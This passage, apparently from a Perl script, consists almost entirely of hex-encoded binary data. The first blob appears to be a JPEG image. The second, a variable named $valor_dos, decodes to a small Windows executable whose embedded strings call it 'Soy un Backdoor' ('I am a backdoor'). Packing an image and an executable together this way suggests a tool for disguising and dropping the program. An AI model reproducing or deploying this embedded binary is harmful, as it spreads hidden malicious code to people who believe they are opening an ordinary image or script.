2b3185960869e3af433b6163636b623c5b00001d3a782965d705786ac2d86bc4c8a36f20c634003e41762b3d18deb943e71c1994d385ce01bfa6221cfccb5fb2d1565bae241571d8ec8bf7e0c7e4ebd978f46bb63b9f0eab51041008e8544b8b3fac589d4ec8b2d53b4a8ac32368c3436c59658e31bf08771066dbefbefb0fbadb5143070407348237079105659a01bdd69e96a96f0beadd9e27b7c010f276fbad4d65ba15fdfe33216c02196b27625603d762eff4530df07ad23d9fcdec5ac753e21e7632cb1dd886c39b5c3671f91e10b4259666ac1d39ac30fa9f70dac4fb15d27a08de7dd71f4079fd16a4d7073439a41046e08f150a64af6de61ca8bd4f38ada532f3b9bc422a333c8f3d984a94552ed3f2acc5681c992eda4b71fb2c6ddb72e2fe447f7788fc919ba3b2d96bd3ece3110cd6a16bf81ef20bc0db8a47387d8ab7c7660989114d1c8475e1703b2c9297663a7050ae2d5391f63ba6f7aeef9e3776dccec0edd5754bd94e19a78e95dbf51fd4164a0ede5e1e1f153a6ff02effd1d9553339a9ede4ec4d88d35331bdd92cb7923ef3603e2d67ed3fec3e2a957703afe8e3a7a58cd5325dad33380c73bb69003d4071df6fa8ea555b0b67258989ba4f3af930d42dd8de6b723482d66def35a40db9ec39f4e7e48d3b3b67e685e303566c8d99f1da4fdd8daffe5f9bb20c85eff10ddff1bbc7c82f6495b39a3af59ab251c9e7a8cc4495edc4049287100163c780dfa1e9cd5f7035b17530d5abe17b93458cda230b839a479ee3a9f32a414ecf896dee152ecef0f91c5e2aed8c943ecd364ae3ed0abbefdcb5db6c0faf2e6adc88a198888808888088880888822f5069dc66a7c69a195afdec3c41ed20f0b98e1e208e855725ecaf4f370d72ab229acd99abba28ecdb98caf8cedee96efc86c76e80745774418c63b333d3c7e1752c81cc9f1331a194691b9eef70c7efe7b1e177cd6cac7b5ed0e690e6b86e08e842cb3298a8eb6b6cf6024d9b573b57dae2e5f85e776bfefcd59fb38ccc992d150b6c9dede34baa4e3a1e28f90ff0ec8d2fcc4594ebdbeb4ed52d4b31126374fed144cea1d2f89fef03fdd0acb94cbd4c457efad39c4bb93238d85ef90f935a39955cecd1a25d3d63224b8c97ae4b33cb8ee7aedd7c7e3eaadfb0df7db9f9ab43af15754e14cb9da1cd49bdfcba5b2b1d4e5bcf2c7c1cbcf6e9f752782d7183cfc8d820b0e82cbba4138e171f8781f91503da2645f7ed43a6ebc858c2cefedb9a7c3f51bf5e7f45dda5a862f56695860c9d66baee3ddecef95beecac2dfc243873e9b7d146f95bb7247cded2b36a4c71cb69cbf41ade27cd0b8307f58736fdc053da0b3835068cc75d2ede66c4229c13b91233dd76ff1db7f9a8ba15e6ab4d95e7b26cba31c22570d9ce1e1c5e67ccf8f5505a7722cd13ae6ce2ad3bbac5671fdfd691c766473feb377f5e5fe14963d45771166a68b85ca8723c39ac8331584bb9090ecdad03e43b7a02566fd9bb641a2aa3e5fc523e47efe7bbcf35cf6ddaae3a7866e9caf20759b843e700f36460ee01f891f4057bf48d5f63d258b876d88acd7100efcdc388fe6a61d1d3c7ccf7e4b1f5f2b8e9e85a6f1433b0b1de63d47a8505a53b401a5ec7f05356cae89d57ddab79c376c91fea876dd3978fa6c7a2b3aafeaed255755506b1ee10da87730cdb6fb79823c41532df2e3ef8dc795cec6b1d355689bb2e728f7006fc4d9dae27e001dcfc9659633763b4fd6d59d044f8f038893bd1c43f9c70e84fa9dba780dd57dda53198e94333d83cbc2e6edfc6d0709a093edc437f2dfe8ad588ad632d522c763f112e1302c3c529986d35a1fb3b7500f8bb7e6392873d31f3cae8c7b64635ec3bb5c0107cc2fa5c0000d80d804739ac69739c1ad037249d8052ee72ba6d54ad7abbabdb8239e2775648d0e07e454364b5ce9bc592d9b2714b20fd483f8c3bf97bbc87cd41cdda5be676d8bd3f6e71bf27cee1137f7a89b56be655ee89e1ec3a5729a6ec3afe8cc8bea92789f8f9ddc50cbe9cfa7fbe615a34bf68d532d686273301c466072f6798fbb2fab1de3f0fa6eb3d9756eb1b5b7750e3e8b7d417bbf32144e52965f3c1832f971308ddc4c0cacc696fc1c39ae6b75586bf9995ba6b5f9ad65fa3117e7795f7e85574b63546684718f0baf1b7a01baba762daa725996e5285fb53da8aaf03e092c3f89ed6b8bb705dd4f41d55f166ae5e6ae7cb86d8bd4d51171b82a36de5f86d9a18f87db2e0d8bda1dc2c841e864773e1f41b127cb6e6b5629345e6a70da8da5d6ec89a4778319c0c6fa01ccfd495e94044440444404444141ed3a3f61b180d42de5ec5744331f28e41b1fc87d578b4bcc30fda0e73124964394ac2ec0de7b178e4fdbd4f33f256ad7b8dfd2da1f2d503777fb3ba4672fd667bc3ee166993cbcb5b1da5b59d784d892b6d1cd1b4edc6d7b785c371ea08f9a34af34984cf673c3fc05c770edd1fbede7c6e561b5622a7526b333b8628585ef3e400dcaaf680867ada68c1660f679a3b3287c3ff4cf16fb7dd74768d79d16023c744eda5c8ccd87e0ceae3f603e6adeceea6fb235e54ca32cd7e6b597b3bf7f7e53273fd56746b7e417b70d931a6f5232ec87868df021b5cf931dfa8ffdc7d095f0c63638dac60d9ad0001e8be67863b10be195bc4c78d8858ef9dbea6fd0d6dd2c618f31e3f96b0a333f82a9a8b15250b6360ee6c900f7a3778387fbe8ab5a1f51be37b74e64e4de789bbd499c7f9e8c746ff687e43d15e16de5f336acf35b472a457ed0755683e1a1a9681cb536f28af46e21c47802e23627d0ec7d4ae2ef6df90c9ed4b4d601e6d48366be577785a7d18d1f7276f4566c9c3982eef3193d4783c9f5edb0f09f839bcc7cc1eaa048d6a5a6bd1c5623181e7de983f8f6f5000ebf105469c76c3112a6653037a5bb5a964ec7b66a1ccccd7d87177118211cfe479787201bb0e4b608a36c30b2260d9ac686b47a0501a6f48c585b12e42e597643293ff396641f87cc37c82b12986f8e9da222235178f2796c7e1aa9b391b71d788742f3cdc7c80ea4fa0558d47aec55b9262b0ac8e7bac3c32cd29da380ff00dc7d153cfb158b46ee5b2915fb7e2f9a56f0b7d1addf60161973d71fef28aeed3f2ac377b45bf90263d3b8c219d3daed8d9bf10d07f7fc9424f43219621f9dcb58ba77dfb96bb8221f21fbb65c499fc542de76d879720c04fe4a3aceb1ab1ee2b4124a7cdc7842e0b65eab2f15aea1a76e0a737b6fff007e89aad8fa74c0f67ad1c647eb06f3faf54b791a945bbd99d8c3d4377ddc7e5d5532dea6c95b25ac9040c3fab1723f5eabb31ba72e641fdf592e8613ccb9ff0089df01fbcaa7dd351dd9ac7deb73db86ab051cdbf2973baa75c8819ce4964fc800a5279e2ad0ba699e191b06e5c543cd97c560ebfb356da4737f5233bf3f52aad93cbdaca4bc533b660fc31b7a0515e97e2db711db5ff69bf5318aba99ddbfd3bb379a932b36c3765761f719e7ea7d55ebb36d275327829aee43da1d1cb316b6364ef8daf006db90d237e64f8acd2189f3ccc862697c923835ad039927a2de6861f2b86af83c7e3a48994abb5dede1c0173c91bf23fda27a7a2f5e948a476c7879f499c979b5b9792ee94b3886473e93c864285aef1ac6c6db25d0004f32f6bb7dc01b9f1e654be83d6146ae3ec6132b09a997a32113b18d74afb8e3cccad0017bc9ea791ea3c0803d74f2b4afdab75ab4dde4b49e239dbb11c24ffb3f455ac74229f6e74194f88367a523ad7bc5dbee243cc9df6e619f60ad29cd4ac4774348873766c480334fe4c4647295fdcb07c385d2077d9494523a489af744f89c7ab1e46e3e848fbafb5ca872888883ffd2d99111011170e7358d2e7101a06e49f04117a933b434e60ec64722efe2636ec180fbd238f468f52b32d318c19aecf5d8ab4d35f696460611b98487f1346de9c97adf71dda06ac75f773c0e1e42da8df0b130eaf3e60787cbccab1d7a915692c3e3df7b12f7afdff6b8437f268530eac18e7d52ec6451c6e7b98d0d323b89e4789d80dfe807d1677abecfb76b46c00eecc756008f291fccff008765a3ac944fedb96cade278bbfb8f0d3bf5637dd6fd828b787add0e3efea2b1fa73f4ff00b772222c9f58f35ea62dc6de1798a689c1f14adeac70e842ba691d5bfa581c6e48361ca42398e8d9dbfb4dfde3fd8aa2f3daa6db3c2f6bdd14f19de29a33b3987d0ab44e9e5f5dd0fc6fc4c7eafedae22a0e13b407d37b286a66f76ee8cbcc1ee3ff00b43c0ffbe4af50cf15985934123258de376bd877047a15ac4edf39313133598d4c3b11110170e04b4807624755ca20fcdb97c7dcc5e56c53bc1c2c46f3c649df8bc77f9f55e25fa0b52e91c66a7800b6c31cec1ee588c0e31e87cc7a2ca73dd9c6770dc72c70fb7566f3ef201b903d5bd47dd469c19315ab3c7854d7dc662077943c8f26903eebe5cd2d24386c47220ae143148c39565300d4a50b2403f9d9377bb7f9f21f45d56b2d7ee8227b2f734fea83b0fa05e3454ecaef7ae57f896d6b7c088a534e69dc86a8cc458cc6c61d2bc12e738ecd63475713e4aea2d7d9669a390c99ccd961f67a6768b71c9f27fa75f8ecb4e35b2875236d0b8c18c15f80d7db99937fc5d3cbd54563aaeacd398e83171e8d13b206f0892add670bfcddef73dc9e7cd733d8ed0ae3fb9a1a4e3a5bff004b6ecb1c1bf4214bae97c75af948652f6234bd2b392999140653c4fe0680f9dfb721ea579fb2cc3ddbd7efeb5cac66397203bba91bbab21dfafcf6681f03e6bb30bd96cb67211e5b59647f4ad9610e8eab794119f2dbc7e1b01e7bad15ad6b1818c686b5a36000d8008c7264efe23c3e91114321111011110167fda6e7ecf0d6d25897ed7f2deecaf1fd0c3fac4fc46ff2055db2590ad8ac6d8c85b7f0415a33248ef4017e7ac47687047abf219dcad392696f3f85b235e3f93c7bf2686edcf901e3e08b56226796af8ac6c188c657c7d61b4503034799f327d49e6bd6baab5986e568ecd790490cad0f63dbd1c0f42bb559e946b5c3a6ecfecd46c4fb6fdd44e7ede7b0dd6478569188afb924b9bc449f124eeb4ed4d23a2d2d95918785cda72904787ba566d8e686e36b00361dd37f254bbd5fb2a379ed3fb7fcbd2888b37d1888baf1d8db5aa324fc7d4718a94247b5d969e7fd86faff00bf8cc46dcdd4f534e9e9dd6ff11fab8ad8cb5aa667d0a0c6fb334ed3db78dd91fa37f69df929d8bb3fca60cf7ba6f50cb0bbc61b0dde371f972fb2ba50a157194e3a74a16c3046366b1a3eff0015e85ac469f299f25ba8bf7dfcff004a7333fabf180372ba6bdb5bd3bea126e4faf0f33f92ef6768986681edb5f2145c46e04f55dcfe1b6eac76acfb2c5de77134c77e4c859c44a8d972f97f74d7d3569e0f5ef2cc2cdbfc454b0d4c7bbaa0d6fa72c3e263324d0f95c1ac6ba378249e839853cb36d5195bb26acd3dfa430d6606c12ba56c10c8c99f211b6c4069f0dbf3579c56771f996bfd8e62648f6ef217b4b248fe2d3cc214bee66252088a1b556a03a6b102f0a6fb64cad8c46d3b75df993b1f2faec8bccea372fbcb697c26707f2fc7c523faf78d1c2ffef0e6a9593ec7a07f13f17927467c23b0de21fde1fe4b4889e648992163985cd0785c362df42b89e78aac0f9e791b1451b4b9ef71d8340f128a5a95b7986099bd0f9dc0406c5caec35c3837bd8e40e1b9e836ebf651f730199c76fedb8ab95c0db732c0e68e7d3990b6fd338f9f5c6763cfdd89ccc1d07ef8f85ed23da641fd291e43c3fd0ad3155c17eddfcafc9982d259dd456db5f1b8e9a4dcece94b4b6367a971e417e8ad05a1aa68ac4185ae13dd9f67599f6db73e0d1e4d1feaad488a88888088880888808888088be5ef6c6c73dee0d6b46e49f008289aee7fd3fa8311a261792cb6ff006ac870feac0ce61a7fb447d879ac93b59af87a7ae26ad86af0d78e2898d999080d6093c760390e5b6fb78a8dd47ab72191d637f394aed8aaf96473227c3296384439346e36f00144e3a8dacd6561a70f1493d9936dcf3ebd5c7f328796e3d9f92743e30924ff0016e1cffb6e5625e6c7518f1b8dad461dfbbaf1363693d4ec36dd7a559e9d6351108ed430fb469cc943c5c3c75656efe5ee9598e2de64c5d571ff00a4d1f65af39a1cd2d3d08d8acbb1a6863a29b0f7294a66a33be274cc97de70dc969d8f2e842cb2cea37adbd1fb3f3462cd3bf787ca2f71a1159697e3a7eff61b989c36900f878fc9787a1d8aceb78b787d2d3256f1bacbcb6cd89a4831f446f6ee3fbb8bfabe6ef905a760f0d5b0189871f547bb18ddcf239c8e3d5c7e2aa9a0b1e2de4ef66a56ee213ec95f71d36e6f23e7b0dfe2af6b7ac6a1f2bd6679cd9a67da3887ffd3bca222b3d51426a4cf9c441157a710b594b8e11d4aa3abdc7c48f20a6d57da63a9dae61277b63fe574a680170e61c3dedc7e5f3292cf2da6b599844e7fb3bc9e1f0516aaf6b9723a829ccdb56413ee700e6e6347937ee37f82b0e033f8ed4549b76948c3270812c7faf19fd93fe7d1682a839eec9b1d7722eca60af4f82bee3bb9d5f9c6e3e278771b6fe876f45571e3cb3494922af7f04bb4aaac6c7067f136c6df8ac46e691f46f3f9af43744eb6bc5adc86acad5222d1c6da3577713bf838ec47c7eca76e8fbc55e8cce7f1980addfe4ad36107f0b3abde7d1a399fc944e374fe63b41b4cb59b826c669d610f8a993c32db3e05fe21be3f979ab3e0bb36d3f85b3edd2452e4f21bf11b77dfdebf7f303a0f8edbfaab6a6d85f34db8f675c30c55e16430c6d8e28da1ac6306c1a07400782ec4450c44444044440444404444044441f064635ed8cbda1eedf85a4f33b75d954fb52cc9c3682bef61da6b40558f978bf91ff0f12af66b3b37fc5ca160cbb50c74ecc73802367493c6e24fc8f00f92faed3e7fd21ab74b6046c5a6736a56ee3986f4fb07fc51311b9d30fa784ca642c36bd5c7d89647740233f73d02d7f41e881a6e075cbc18fc8ca36e5cc42df207ccf89572456d3b69862b3b11111b8a8dae7072c36467e944e9070865d8d8373c23a483e1d0fa7c15e51263644cc4ee3cb23af6038327af2f2ead7b0a94b4f6dcc6c9900d02c41ff300720f07a3bf71562ca685c65e9dd66a3e4c75871ddce836e079f32c3cbe9b28a3a1f390c73475b3151ec9e3744fef6b10784fc0f55cf7c53b89af97a14ebbb79d72b1690a428e94c7c5c3b3df08964dc6c789fef1dfeaa42ae46add9a68ab4c25301e191cce6d0ef2dfa13e9e0ab9168fc95a8a38331a8ec58ab1b43457ad1881ae681b6ce2399566a94eb50aacab5216430c6366b183601743ccaeddc8bc399ca4386c54f7a6e6236fbadf17b8fe168f895ec612e63491b123723c916dfb3e955b524becbad747d8686879bc632e3fb2ee107f3569548ed07ff18d2c77e7fa45bb7f79892cf37a25b22222abcf1111011110111101111011110111101111079b216cd0a135b15e7b262617086067148f3e4d1e2565917697a82dde923b56719a7f776d1d6bd565327cdc4b5ab5c547ed1afb2cc106998bb913641ae7cf34ac6b856aedfc4fd8f427a03f1f244d7cabff00c16b990c365a1c8de865b790b86e4566004063b66f0900f4db87ccf2f15138dc8decff006a50bf2d0f7573198e3148d0439ae783b1734f910fdfe6a670ba934d56c04d162ae35f0e3227131bdc43c86ee77e7d41f3f5552ecb2e4b91d5796bb39de59e22f71f52f054baa62bdd5d35544452ea111101111011110179eedfab8eaceb16e66c518f13d49f203a93e817a1705ad2e0e2d05cde876e6110a6c54725abf370dfc9d7929e1a9bc3eb54946cf9de3a3de3c07fbf3573444445742a5eba85d6350e93863db8df911b027facc574550ccb1b73b54d2750b5e7ba73e725be9cc7dd892cf37a25ae2222ab80444404444044441fffd4d99111011110111101111015032fa16dea7d7d62fe4a57c5858e08a1ee5afd9d6b6f7b879730ce2773f1247cd5fd7082ab9becd74b66e90ae71915391ade18e7a8d11bdbcb6f0e4ef9eeb35d03867e9dd779dc3492b667558c37bc68db8871020ede1c885baaca648451edab2ec6b1a1b768326041f2e107ee0a434c5eb85a511159e888888088880888808888088880aa98069ca76df3ca372cc5d0d86c76d8b801cfcff1956a73835a5ce3b00372557fb1c8dd7e6d43a89fb9f6db9ddc64fecb773ff70fa289737513f2c434e44552ed1b2792a181ad5b1529af6325723a7ed201de10fdf777a1e5b6feaa1c6b66eb9591d56c7a0753626c7e98bf251b6258ae476657481db30b9ae000fc5bf801e83af3b9e2bb42c36532f1e28c37a8d99b7ee05dac6213edfb24fefdba22d6acd6752b4a2222a2222022220222202222022220222202cc75f4671bda569acb1f762b51be9bcf2db7e7b7ddff0065a72a3f6b78b92f68b7ddadb8b38b99b6e323afbbc8fd8eff00244c4ea76f5a2f1e2323165b1356fc4776d8883fe07c47c8ee17b159e9c4ec44444888880888808888088882bdaeb2a313a4aeca1dc32cccee63dba92ee5cbe5b9f92f7e072f88ecf745e2f177a6749907422434ebb0c933deff00788e11d3aedb9d87259bf6b39defb2d57155dfff0027fc6c9b1e5c67a7d07e6a7f4dc8d9abc70e94c77e92cbcd131d732360931c4f70dcf1c87993d7dd0a25c79262d7e6788582feb1d516abbac88e8e99a1ff005eebbbd9fd366f2683e8775013e465cb411b9d7b3d95124ec6c16e56f7151b3177b8e0d1c3c5b100edb1d86eae588ecdea0b0cc8ea5b0ecde40731deff003117a323e9f55cf69515caf86c6e431f4df6198cbec9e68616fbddd70b9a7603fb5f2489d4b28b56278852f4f9bfa7af3dd9e339758696d685ac75892470e6787877db90f4dfe4a75989c96add4588b0719671f8ec5d96db362d3381f339bb16b1acea01f1276faa8d17a5d5fac34f8c14361d0e3ec8b36ec3e373191b796ec248ea40216b8af92f37b6e57c97fcb1e05ca22cd80888808888088880888808888088880baec4115aad2d79d81f14ac2c7b4f47348d885d8883ffd5edd2464d33a8323a32eb88ee24335173bfa488f3e5f2e7f55745e2ed3349d8cb52873b87e2666717bbe2e01ce56752df53d76f891e2bc5a5b5257d4b8a6d866ccb11ecdb10f8c6ff00f2f2530ecc17dc76ca691114ba4444404444044440519a8b37069ec34f7e6d8968e1899fb6f3d02f7cf3c55607cf3c8d8e28da5cf7b8ec1a02abe97a337683a9d99fb713e3c1e31fb5389e36efe51fae7cc0ff0021e692cb2e4ec8fdd0fa3fb27c86a2b873bab0be0867777becfbed24dbf3f7bf647dfe0b68c7e3a962a9c74e8568eb578c6cd8e36ec07fbf35e85caabcf170b9441c000740b944404444044440444404444044440444404444044441c2cf757e87bf5f26fd4fa40b22c8104daa67932d0f41fb5f9f5e47ae86b844c4eb9866584d6343312474dcc7d5c8f198e6a728d9f1b83493d7a8e5b2b0a8fd691d5835be9ab1dc3193cded11ba60d1c4efe2c6cd27c7aa88d539ab18ccde0e1ab4e7baf92495e6bc0377bc0611cbcf6e2df6f456dbb699374eeb2ce8abb06bac13e5305b9e5c6d81f8a0bd13a2737c39efcbafaf82958b338ab0ce387274e56efb71327691f628d62d59f12f6a2f37e92a1ffd6d7ffd56ff009af0dbd57a7a935c67ccd31c2762d6cc1ee1f26ee513b884baf3643234f154df72f4ec8208c6ee7b8fd8799f40aac75cdbcc48eada47056b292efb77ef61642c3e64ff00996a94c4f65f732b723ca6b9c87b7cade71d084910c7e848db7f80f2e64a6d8df3d63c7284a7472fdaa5c1b364c7e98865f79e793ed6de03fdec3d485af51a55b1b4a1a54e26c35e060646c6f4680bb21862af0b218636c7146d0d6318360d03a003c1762ab8ad69b4ee4444440888808888088880888808888088880888808888088880888808888283da4f14198d2970ec58cc83a1209d8ef237607ec578a42eff008ada6411ee7716b63ebddf3fdca73b51a4fb5a26c59886f2e3a465c67fe43b9fb6eabb6ec81acb47e5e37010cd2be1dc8dc7f1b1fbbf32a5b567f0e61a3ddc6d0c945dd5fa55ed47fb33441e3e842af5becbf45dd3bc98181849e2fe25ef8bff00691cbd15ad1431524763fa1c389fd10f20f81b52ec3fc4a468f675a3f1c5a60c0547168e4666994f5dff005c9e7eaaca883e228628236c50c6d8d8de4d6b06c07c97da22022220ffd6d991110111101111011110111101111011110111101111011110111101111074daad15ca92d599bc514cc2c7b7cc11b158ecf52d45a42c503bbb23a66e07337ea446ee261f818cad86eddad8ea535cb73361af034be491e760d016633e7a1bdaca2c9d2c56423c7e4e1104f62683863908fe6dfd771b825bef01cb646b8bcebf569b46e4390a105daee0e86c46d9187cc11b85e8599d2c66a5a34462a967db431f59eef6631576c929613b80e2ee400df61b78295d05a83296f2798c0662cb6ed8c6398596db186778c78dc0701c811fefa22b6c76ac6e57744445044440444404444044440444404444044440444404444044440444404444044440444415cd7d82b9a8f48dbc763dcd161c58f635e760fe17077093e1becaad2e5f3f4a4a50dfd36691b53b6b87bedb1cde2d893b06ee480013e1d3aad3151bb50ad762a58dcf546095987b2669e12ee1e28c8d891bf88fde8d2979acf0f0e6aac7733584ad667b3155b561f0482bcef89c498cb9bcda478b7eeae581d3589d3555f5f155bb96c8ee291ce7173a43e649e65675a7724fed0b53e3ec50af2418ac3cded333e7e10e7cbb6cc68009f32775ad2994e5b45adc0888a1908888088880888808888088880888808888088883ffd7d99111011110111107ffd9";
my $valor_dos =
"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c010500d750435100160000d2010000e00007030b010238000a000000120000000200002012000000100000002000000000400000100000000200000400000001000000040000000000000000600000000400004252000003000000000020000010000000001000001000000000000010000000000000000000000000500000ac020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002e746578740000003009000000100000000a000000040000000000000000000000000000600000602e64617461000000400000000020000000020000000e0000000000000000000000000000400000c02e7264617461000000010000003000000002000000100000000000000000000000000000400000402e62737300000000b0000000004000000000000000000000000000000000000000000000800000c02e69646174610000ac020000005000000004000000120000000000000000000000000000400000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005589e583ec18895df88b550831db8975fc8b0231f68b003d910000c077433d8d0000c0725bbe01000000c704240800000031c089442404e89407000083f801746c85c0742ac7042408000000ffd0bbffffffff89d88b75fc8b5df889ec5dc204003d930000c074bd3d940000c074bb89d88b75fc8b5df889ec5dc204008d76003d050000c075e8c704240b00000031f689742404e83707000083f801743485c074cdc704240b000000ffd0eba1c7042408000000bb01000000895c2404e80e07000085f67488e845020000bbffffffffeb81c704240b000000b901000000bbffffffff894c2404e8e4060000e962ffffffeb0d909090909090909090909090905589e55383ec248d5df8c7042400104000e86a07000083ec04e8f2010000c745f800000000b8004040008d55f4895c24108b0d002040008944240489542408894c240cc7042404404000e8b1060000a11040400085c07458a3102040008b15dc50400085d20f858b00000083fae07420a110404000894424048b1ddc5040008b4b30890c24e8660600008b15dc50400083fac0741b8b1d10404000895c24048b0ddc5040008b5150891424e840060000e82b0600008b1d102040008918e81e01000083e4f0e8f60500008b08894c24088b150040400089542404a104404000890424e8a900000089c3e8c2050000891c24e89a060000894424048b15dc5040008b4210890424e8e50500008b15dc504000e955ffffff8d76008dbc27000000005589e583ec08c7042401000000ff15d0504000e8c8feffff908db426000000005589e583ec08c7042402000000ff15d0504000e8a8feffff908db42600000000558b0dec50400089e55dffe18d742600558b0de050400089e55dffe1909090905589e55de957020000909090909090905589e583ec0883e4f0b80000000083c00f83c00fc1e804c1e0048945fc8b45fce86b040000e806010000c7042400304000e84a050000e815060000b800000000c9c3909090909090909090909090909055b90031400089e5eb148db6000000008b51048b0183c10801820000400081f90031400072ea5dc390909090909090905589e5dbe35dc39090909090909090905589e583ec08a1202040008b0885c97426eb0d90909090909090909090909090ff108b0d202040008b51048d4104a32020400085d275e9c9c38db426000000005589e55383ec04a11c19400083f8ff742985c089c3741389f68dbc2700000000ff149d1c1940004b75f6c7042420134000e8cafeffff5b5b5dc38b0d2019400031c085c9eb0a408b14852019400085d275f4ebbd8db6000000008dbf000000005589e55383ec04a12040400085c07536a11c194000bb01000000891d2040400083f8ff742585c089c3740f908d742600ff149d1c1940004b75f6c7042420134000e85afeffff5b5b5dc38b0d2019400031c085c9eb0a408b14852019400085d275f4ebc190909090909090909090909055a17040400089e55d8b4804ffe189f655ba4200000089e5530fb7c083ec64895424088d55a831db89542404890424ff15b4504000ba1f000000b90100000083ec0c85c07507eb4601c94a780e807c2aa84175f409cb01c94a79f2833b3c750789d88b5dfcc9c3b944304000baea000000894c240c89542408c7042471304000b89030400089442404e892020000b8bc304000bbe40000008944240c895c2408ebd78db426000000008dbc27000000005589e557565381eccc0000008b0d7040400085c974088d65f45b5e5f5dc3c7459841414141a1203040008d7598c7459c41414141c745a0414141418945b8a124304000c745a441414141c745a8414141418945bca128304000c745ac41414141c745b0414141418945c0a12c304000c745b4414141418945c4a1303040008945c8a1343040008945cca1383040008945d0a13c3040008945d40fb70540304000668945d8893424ff15b05040000fb7c083ec0485c0898544ffffff0f853b010000c704243c000000e89302000085c089c30f8459010000fc89c78b8544ffffffb90f000000f3abc7430450184000b901000000c7430830144000a140404000c7033c0000008b1544404000c7432800000000894314a1302040008953188b153420400089431ca150404000895320c74330ffffffff89432c8b153c204000a138204000895338ba1f00000089433489f689d821c883f80119c0242001c9044188842a48ffffff4a79e7a120304000898568ffffffa12430400089856cffffffa128304000898570ffffffa12c304000898574ffffffa130304000898578ffffffa13430400089857cffffffa138304000894580a13c3040008945840fb70540304000668945888d8548ffffff890424ff15a85040000fb7f883ec0485ff754231d285d2751e891c24e863010000893424ff15b050400083ec040fb7c0e85ffdffff89c3891d704040008d4304a3604040008d4308a3804040008d65f45b5e5f5dc389f8e838fdffff39d889fa75b1ebb1e83b01000090909090909090909090905189e183c1083d00100000721081e9001000008309002d00100000ebe929c183090089e089cc8b088b4004ffe09090905589e583ec188b4514894424108b45108944240c8b450c894424088b450889442404a1dc50400083c040890424e8ee000000a1dc50400083c040890424e8ce000000e8b9000000909090909090909090ff25d050400090900000000000000000ff25d450400090900000000000000000ff25c850400090900000000000000000ff250451400090900000000000000000ff25cc50400090900000000000000000ff25e450400090900000000000000000ff25c450400090900000000000000000ff250051400090900000000000000000ff25d850400090900000000000000000ff25f850400090900000000000000000ff25fc50400090900000000000000000ff25e850400090900000000000000000ff25f050400090900000000000000000ff25f450400090900000000000000000ff25b850400090900000000000000000ff25ac50400090900000000000000000ff25b450400090900000000000000000ff25b050400090900000000000000000ff25a8504000909000000000000000005589e55de9a7f9ffff909090909090905589e583ec08a1dc504000ff4804837804007811a1dc5040008b100fb6128955fcff00eb10a1dc504000890424e80effffff8945fc8b45fcc9c39090ffffffffd018400000000000ffffffff0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff000000000000000000000000004000000000000000000000000000002c19400000000000000000000000000000000000ffffffff00000000ffffffff00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000536f7920756e204261636b646f6f7220784444440000000000000000000000002d4c49424743435733322d45482d322d534a4c4a2d475448522d4d494e475733320000007733325f7368617265647074722d3e73697a65203d3d2073697a656f66285733325f45485f534841524544290025733a25753a206661696c656420617373657274696f6e20602573270a00002e2e2f2e2e2f6763632f6763632f636f6e6669672f693338362f7733322d7368617265642d7074722e63000047657441746f6d4e616d6541202861746f6d2c20732c2073697a656f662873292920213d2030000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004050000000000000000000004c520000a85000005c5000000000000000000000a0520000c45000000000000000000000000000000000000000000000000000000c51000018510000285100003451000044510000000000000000000064510000745100008451000094510000a8510000b4510000c0510000c8510000d4510000e0510000e8510000f4510000005200000c52000014520000205200002c52000000000000000000000c51000018510000285100003451000044510000000000000000000064510000745100008451000094510000a8510000b4510000c0510000c8510000d4510000e0510000e8510000f4510000005200000c52000014520000205200002c52000000000000010041646441746f6d4100009b004578697450726f63657373000000af0046696e6441746f6d4100dc0047657441746f6d4e616d65410000df02536574556e68616e646c6564457863657074696f6e46696c74657200000027005f5f6765746d61696e61726773003c005f5f705f5f656e7669726f6e00003e005f5f705f5f666d6f64650000000050005f5f7365745f6170705f747970650000000079005f636578697400000000aa005f66696c627566000000e9005f696f6200005e015f6f6e6578697400000084015f7365746d6f64650000150261626f7274001c0261746578697400000000300266666c757368000000003902667072696e74660000003f0266726565000072026d616c6c6f63000000007f027072696e74660000000090027369676e616c0000000000500000005000000050000000500000005000004b45524e454c33322e646c6c0000000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000001450000014500000145000006d73766372742e646c6c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000